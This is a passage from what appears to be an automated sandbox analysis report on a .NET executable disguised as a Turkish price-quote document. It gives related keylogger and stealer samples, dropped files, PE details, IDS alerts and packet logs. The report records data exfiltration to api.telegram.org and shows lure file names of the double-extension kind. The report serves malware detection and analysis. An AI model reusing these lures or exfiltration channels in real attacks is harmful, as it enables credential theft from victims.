	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
checkip.dyndns.com	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	jqxrkk.ps1	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
api.telegram.org	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	gem1.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	149.154.167.220
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	gem1.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DyM4yXX.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	149.154.167.220
	5dFLJyS86S.ps1	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	jqxrkk.ps1	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	0V2JsCrGUB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	https://boutiquedumonde.instawp.xyz/wp-content/themes/twentytwentyfive/envoidoclosa_toutdomaine/wetransfer/index.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	Fantazy.x86_64.elf	Get hash	malicious	Unknown	Browse	1.3.115.13
	https://sora-ai-download.com/	Get hash	malicious	Unknown	Browse	104.22.20.144
	ReIayMSG__polarisrx.com_#7107380109.htm	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
UTMEMUS	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	jqxrkk.ps1	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	jqxrkk.ps1	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.96.1
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
3b5074b1b5d032e5620f69f9f700ff0e	PO-12202432_ACD_Group.pif.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ-12202430_ACD_Group.pif.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO-12202432_ACD_Group.pif.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://cipassoitalia.it	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	149.154.167.220
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.log

Download File

Process:	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.337066511654157
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
MD5:	55A2AF8F9FCA3AE99FBA235D3E16A53F
SHA1:	32F34219599006657BFF0B868257916A0C393AAA
SHA-256:	2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
SHA-512:	F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.354777075714867
Encrypted:	false
SSDEEP:	24:3gWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKIl9r+q:QWSU4xymI4RfoUeW+mZ9tK8ND3
MD5:	0CBD5C86CC1353C7EF09E2ED3E0829E3
SHA1:	0FFE29A715ED1E32BB9491D3DD88FB72280ED040
SHA-256:	B7A6D1B47CEA0A5084460775416103112E56A7A423216183ABAC974960FD51E7
SHA-512:	C60EC6550188DCCD1EAD93CC49011BAC45134426ADEF81410468A1F613AD8F2E67AEF296F5C92092A62BFAC746FCA9DC8741FEC5600996F28A48BF2488E94D40
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_druo5hmv.kcx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_katgu54e.fky.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lof0dgap.dzt.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wiqgnnyx.up1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.379093109685376
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
File size:	1'077'248 bytes
MD5:	170c62d3ca5f52d7307613cc070194b7
SHA1:	41c97a3f21f9e5c9d636f3228c780baea6fe9b09
SHA256:	1ab57c3722041788277908522650c68f137e173a4862aab5ac10b6d3ea1d7ef5
SHA512:	75b562adaf41d495715788a7f5e22158cc6de7c1498bea41a43a9e1c03f54d1e6d8e25a28fba157904ef83702dbcd278fa8dda6e00fd9e33c3fbf3af76acb835
SSDEEP:	24576:Wbj30ivvE/4NPy/j+oHTblXCPjm7kTyd:0jki3E/4y+oHxC67qyd
TLSH:	5135F1151A44D04BD826B3709AB6F2B81B703D8EF610D64B6FF8BDBF3578A124C69613
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....kg..............0..d............... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x5082c2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x676BACA0 [Wed Dec 25 06:56:32 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x108270	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10a000	0x608	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1056f0	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1062c8	0x106400	98d52d74126d75d5e7a4f8044418e022	False	0.7812676879766445	data	7.386508416356192	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x10a000	0x608	0x800	799e2dd29b3eff19722499a055dd5fb3	False	0.3408203125	data	3.452455801882886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10c000	0xc	0x200	71d00de0fca6bb073d51e431166de5a3	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x10a090	0x378	data			0.43355855855855857
RT_MANIFEST	0x10a418	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T19:09:58.474150+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49708	132.226.247.73	80	TCP
2025-01-09T19:09:59.662112+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49708	132.226.247.73	80	TCP
2025-01-09T19:10:00.249215+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49711	104.21.96.1	443	TCP
2025-01-09T19:10:02.114780+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49713	132.226.247.73	80	TCP
2025-01-09T19:10:02.735524+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49715	104.21.96.1	443	TCP
2025-01-09T19:10:26.833472+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49721	104.21.96.1	443	TCP
2025-01-09T19:10:36.281626+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49726	104.21.96.1	443	TCP
2025-01-09T19:10:37.510861+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.8	49727	149.154.167.220	443	TCP
2025-01-09T19:10:44.381009+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.8	49728	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 19:09:57.454893112 CET	49708	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:09:57.459723949 CET	80	49708	132.226.247.73	192.168.2.8
Jan 9, 2025 19:09:57.459891081 CET	49708	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:09:57.460169077 CET	49708	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:09:57.464886904 CET	80	49708	132.226.247.73	192.168.2.8
Jan 9, 2025 19:09:58.187527895 CET	80	49708	132.226.247.73	192.168.2.8
Jan 9, 2025 19:09:58.204375029 CET	49708	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:09:58.209140062 CET	80	49708	132.226.247.73	192.168.2.8
Jan 9, 2025 19:09:58.418262959 CET	80	49708	132.226.247.73	192.168.2.8
Jan 9, 2025 19:09:58.474149942 CET	49708	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:09:58.487610102 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:09:58.487647057 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 19:09:58.487730980 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:09:58.498624086 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:09:58.498656988 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 19:09:59.001152992 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 19:09:59.001301050 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:09:59.054217100 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:09:59.054249048 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 19:09:59.054738045 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 19:09:59.099158049 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:09:59.262485981 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:09:59.303353071 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 19:09:59.387834072 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 19:09:59.387902975 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 19:09:59.387952089 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:09:59.401287079 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:09:59.405539036 CET	49708	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:09:59.410495043 CET	80	49708	132.226.247.73	192.168.2.8
Jan 9, 2025 19:09:59.619556904 CET	80	49708	132.226.247.73	192.168.2.8
Jan 9, 2025 19:09:59.621757984 CET	49711	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:09:59.621795893 CET	443	49711	104.21.96.1	192.168.2.8
Jan 9, 2025 19:09:59.622200966 CET	49711	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:09:59.622200966 CET	49711	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:09:59.622231960 CET	443	49711	104.21.96.1	192.168.2.8
Jan 9, 2025 19:09:59.662111998 CET	49708	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:00.088181973 CET	443	49711	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:00.090459108 CET	49711	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:00.090488911 CET	443	49711	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:00.249212027 CET	443	49711	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:00.249272108 CET	443	49711	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:00.249325037 CET	49711	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:00.249806881 CET	49711	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:00.252742052 CET	49708	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:00.253870010 CET	49713	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:00.257818937 CET	80	49708	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:00.257873058 CET	49708	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:00.258647919 CET	80	49713	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:00.258711100 CET	49713	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:00.258784056 CET	49713	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:00.263523102 CET	80	49713	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:02.072026968 CET	80	49713	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:02.102104902 CET	49715	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:02.102159977 CET	443	49715	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:02.102289915 CET	49715	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:02.102730989 CET	49715	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:02.102749109 CET	443	49715	104.21.96.1	192.168.2.8
